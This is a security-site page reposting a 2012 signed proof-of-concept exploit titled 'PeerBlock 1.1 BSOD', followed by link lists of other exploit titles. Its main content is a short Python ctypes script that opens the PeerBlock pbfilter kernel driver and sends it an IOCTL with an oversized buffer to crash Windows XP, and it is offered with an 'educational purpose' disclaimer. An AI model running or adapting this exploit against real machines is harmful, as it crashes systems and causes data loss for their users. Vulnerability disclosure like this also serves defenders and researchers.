首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PeerBlock 1.1 BSOD 来源：http://www.shinnai.altervista.org/ 作者：shinnai 发布时间：2012-02-10   -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ======================================================================================================= =======================================================================================================  PeerBlock 1.1 BSOD  Author: shinnai  mail: shinnai[at]autistici[dot]org  site: http://www.shinnai.altervista.org/  This was written for educational purpose. Use it at your own risk.  Author will be not responsible for any damage.  Tested on:  Microsoft Windows XP Professional  5.1.2600 Service Pack 3 Build 2600  X86-based PC  Info:  PoC released as is, I have no time at the moment for further investigations - -----------------------------------------------------------------------  FILE INFO: (http://www.peerblock.com/) - -----------------------------------------------------------------------  File:             C:\Program Files\PeerBlock\pbfilter.sys  MD5 hash:         2f6e885c432927a186c2e352c8a1cbf4 ============================================================================================================================== ==============================================================================================================================  Proof of concept:  from ctypes import *  kernel32 = windll.kernel32  Psapi    = windll.Psapi  if __name__ == '__main__':      GENERIC_READ  = 0x80000000      GENERIC_WRITE = 0x40000000      OPEN_EXISTING = 0x3      CREATE_ALWAYS = 0x2      SYM_NAME   = "\\\\.\\pbfilter"      dwReturn      = c_ulong()      out_buff      = "A" * 4000      in_buff       = ("")      handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)      dev_ioct = kernel32.DeviceIoControl(handle, 0xabab, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None) ============================================================================================================================== ============================================================================================================================== -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (MingW32) iQIcBAEBAgAGBQJPM5D3AAoJEJfnJLqVA1kXbmwP/AhtZQ9aRnnfBLK4CmvNEorj fhacEfnsf95dcGkHB7UDPmUR/vPsOFHzXDNzKQbzV0RAOK8zPDnXWP8X2I8rEnUx a1ULw0wwo/07R2n4UvbqVDE5Pw3L2ZM9OEBvbg/SmEmPTYmFLXRkl/qwrruOp2be UJN5Bm8rjOZl9SaOEMb++cdaU1ieKJIsphNPeH7sOpkg3atBmBaJYzCL/Px66/QB CqjanfugZP6kn6fUo3rbM0LtzHOlMzP/ZCQl5EYK/G98N6YzD9wOuZV4L3foPG6a 8dJg7VpNA+umiKgqQ8iIVb0dvPJy46nn0p9bmcqbyil8S98SHaiqIx5QYyLt1jsG PVxAhWk0ec0HXAGgBv2vwKMWy85/BhI7ermaoMIHo+fUFjjgu4L3WRwv+E4mZuQD zUBn/KV6GpWas/zPD41AHWPz0P89V0IMtK5w2DKAejCBoxGyUkNbjBnBClfRmRAL wukua8ZPp5htGUQomjpjrZIu3d+EtWIG2dFKmUNByUfc3z4anY0MU8Cf+dKOduG4 reNP52yJzbcxdxrAVA/GazE5QhqR0eLIf/oq27Lm1Zma/ZRD1B6h50W5nX8zOgzd CW5S6xKQpQRytRDfqrGhYAnaHnGlGTmmhQ4rW9twiV8Ygn6Rz8SM9KmkTzM2P55t +PizKEH12PrXQX8t3GNc =Sbvp -----END PGP SIGNATURE-----   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·SciTools Understand 2.6 DLL Lo ·Sysax Multi Server <= 5.52 Fil ·mozilla firefox <= 10.0 local ·os-x/x86 bind backdoor tcp por ·TORCS <= 1.3.2 xml buffer over ·Citrix Provisioning Services 5 ·linux/x86 sys_execve("/sb ·Adobe Flash Player MP4 Sequenc ·Quartzo InterApp Control 3.22 ·jetVideo 8.0.2 Denial of Servi ·Backbox Linux/x86 shutdown sh ·Typsoft FTP Server 1.10 Multip   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved